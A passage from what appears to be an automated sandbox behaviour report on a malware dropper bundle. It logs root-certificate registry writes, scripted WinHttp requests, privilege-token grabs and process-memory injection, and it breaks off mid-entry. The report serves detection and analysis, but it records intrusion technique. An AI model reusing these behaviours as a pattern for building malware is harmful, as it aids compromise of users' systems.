a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun05d60bc3b96248e5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun05d60bc3b96248e5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sun05d60bc3b96248e5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun05d60bc3b96248e5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun05d60bc3b96248e5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sun05d60bc3b96248e5.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 246 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
pid Process 3492 iexplore.exe 3244 installer.exe 2372 anyname.exe 3720 gcleaner.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1172 Sun05532f7abc.exe 1172 Sun05532f7abc.exe 788 powershell.exe 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1788 Sun05ac1b0207d3ff3b8.exe 1788 Sun05ac1b0207d3ff3b8.exe 1788 Sun05ac1b0207d3ff3b8.exe 1244 Process not Found 1244 Process not Found 1788 V4lKmhz9b.exe 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1204 WerFault.exe 1204 WerFault.exe 1204 WerFault.exe 1204 WerFault.exe 1204 WerFault.exe 1204 WerFault.exe 1204 WerFault.exe 1204 WerFault.exe 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
pid Process 1244 Process not Found 1204 WerFault.exe 2664 WerFault.exe 3020 WerFault.exe 2380 WerFault.exe 2504 WerFault.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1172 Sun05532f7abc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeAssignPrimaryTokenPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeLockMemoryPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeIncreaseQuotaPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeMachineAccountPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeTcbPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeSecurityPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeTakeOwnershipPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeLoadDriverPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeSystemProfilePrivilege 876 Sun05d60bc3b96248e5.exe Token: SeSystemtimePrivilege 876 Sun05d60bc3b96248e5.exe Token: SeProfSingleProcessPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeIncBasePriorityPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeCreatePagefilePrivilege 876 Sun05d60bc3b96248e5.exe Token: SeCreatePermanentPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeBackupPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeRestorePrivilege 876 Sun05d60bc3b96248e5.exe Token: SeShutdownPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeDebugPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeAuditPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeSystemEnvironmentPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeChangeNotifyPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeRemoteShutdownPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeUndockPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeSyncAgentPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeEnableDelegationPrivilege 876 Sun05d60bc3b96248e5.exe Token: SeManageVolumePrivilege 876 Sun05d60bc3b96248e5.exe Token: SeImpersonatePrivilege 876 Sun05d60bc3b96248e5.exe Token: SeCreateGlobalPrivilege 876 Sun05d60bc3b96248e5.exe Token: 31 876 Sun05d60bc3b96248e5.exe Token: 32 876 Sun05d60bc3b96248e5.exe Token: 33 876 Sun05d60bc3b96248e5.exe Token: 34 876 Sun05d60bc3b96248e5.exe Token: 35 876 Sun05d60bc3b96248e5.exe Token: SeDebugPrivilege 2032 Sun059375dac544fc4a.exe Token: SeDebugPrivilege 1428 Sun050462125c7d35.exe Token: SeDebugPrivilege 788 powershell.exe Token: SeShutdownPrivilege 1244 Process not Found Token: SeDebugPrivilege 2760 taskkill.exe Token: SeDebugPrivilege 2860 5301299.exe Token: SeDebugPrivilege 840 2.exe Token: SeShutdownPrivilege 1244 Process not Found Token: SeShutdownPrivilege 1244 Process not Found Token: SeDebugPrivilege 3012 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 1204 WerFault.exe Token: SeShutdownPrivilege 1244 Process not Found Token: SeShutdownPrivilege 1244 Process not Found Token: SeDebugPrivilege 2256 5502626.exe Token: SeShutdownPrivilege 1244 Process not Found Token: SeDebugPrivilege 2772 taskkill.exe Token: SeShutdownPrivilege 1244 Process not Found Token: SeShutdownPrivilege 1244 Process not Found Token: SeDebugPrivilege 2156 4604564.exe Token: SeDebugPrivilege 664 taskkill.exe Token: SeDebugPrivilege 1620 BearVpn 3.exe Token: SeShutdownPrivilege 1244 Process not Found Token: SeShutdownPrivilege 1244 Process not Found Token: SeDebugPrivilege 2628 6753134.exe Token: SeDebugPrivilege 2624 taskkill.exe Token: SeShutdownPrivilege 1244 Process not Found Token: SeDebugPrivilege 1732 taskkill.exe Token: SeShutdownPrivilege 1244 Process not Found Token: SeDebugPrivilege 2920 6753134.exe Token: SeDebugPrivilege 2616 2598751.exe -
Suspicious use of FindShellTrayWindow 16 IoCs
pid Process 2744 ultramediaburner.tmp 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found 328 setup_2.tmp 1244 Process not Found 1244 Process not Found 2552 iexplore.exe 1244 Process not Found 1244 Process not Found 3244 installer.exe 2552 iexplore.exe 1244 Process not Found 1244 Process not Found 3728 iexplore.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1244 Process not Found 1244 Process not Found 1244 Process not Found 1244 Process not Found -
Suspicious use of SetWindowsHookEx 18 IoCs
pid Process 2552 iexplore.exe 2552 iexplore.exe 2640 IEXPLORE.EXE 2640 IEXPLORE.EXE 2640 IEXPLORE.EXE 2640 IEXPLORE.EXE 2552 iexplore.exe 2552 iexplore.exe 2008 IEXPLORE.EXE 2008 IEXPLORE.EXE 2008 IEXPLORE.EXE 2008 IEXPLORE.EXE 3728 iexplore.exe 3728 iexplore.exe 4028 IEXPLORE.EXE 4028 IEXPLORE.EXE 4028 IEXPLORE.EXE 4028 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1996 wrote to memory of 1960 1996 setup_x86_x64_install.exe 26 PID 1996 wrote to memory of 1960 1996 setup_x86_x64_install.exe 26 PID 1996 wrote to memory of 1960 1996 setup_x86_x64_install.exe 26 PID 1996 wrote to memory of 1960 1996 setup_x86_x64_install.exe 26 PID 1996 wrote to memory of 1960 1996 setup_x86_x64_install.exe 26 PID 1996 wrote to memory of 1960 1996 setup_x86_x64_install.exe 26 PID 1996 wrote to memory of 1960 1996 setup_x86_x64_install.exe 26 PID 1960 wrote to memory of 1608 1960 setup_installer.exe 29 PID 1960 wrote to memory of 1608 1960 setup_installer.exe 29 PID 1960 wrote to memory of 1608 1960 setup_installer.exe 29 PID 1960 wrote to memory of 1608 1960 setup_installer.exe 29 PID 1960 wrote to memory of 1608 1960 setup_installer.exe 29 PID 1960 wrote to memory of 1608 1960 setup_installer.exe 29 PID 1960 wrote to memory of 1608 